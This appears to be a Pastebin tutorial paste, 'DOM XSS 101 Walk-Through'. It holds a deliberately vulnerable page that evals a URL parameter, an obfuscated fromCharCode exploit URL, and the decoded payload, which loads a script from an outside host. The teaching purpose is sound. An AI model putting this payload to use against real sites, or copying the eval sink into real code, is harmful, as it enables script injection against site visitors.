Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- DOM XSS 101 Walk-Through
- *******
- Blog discussing this: http://neonprimetime.blogspot.com/2016/01/dom-xss-101-walk-through.html
- *******
- <html>
- <body>
- <script type="text/javascript">
- function logUserId(userid){
- console.log('debug: userid found was \'' + userid + '\'');
- }
- var myurl = window.location.href;
- var useridstartindex = myurl.indexOf("userid=") + 7;
- var userid = myurl.substring(useridstartindex,myurl.length);
- var calllogfunction = 'logUserId(' + userid.toString() + ')'
- eval(calllogfunction);
- </script>
- </body>
- </html>
- <!-- DOM XSS Example url: hxxp://myurl.com/domxsstest.html?userid=123456);eval(String.fromCharCode(115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,110,101,111,110,112,114,105,109,101,116,105,109,101,46,98,108,111,103,115,112,111,116,46,99,111,109,47,102,97,107,101,104,111,111,107,46,106,115,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59))// -->
- <!-- DOM XSS Example code: s=document.createElement('script'); s.src='http://neonprimetime.blogspot.com/fakehook.js'; document.getElementsByTagName('head')[0].appendChild(s); -->
- *******
- *******
- *******
- More FROM @neonprimetime security
- http://pastebin.com/u/Neonprimetime
- https://www.virustotal.com/en/USER/neonprimetime/
- https://twitter.com/neonprimetime
- https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment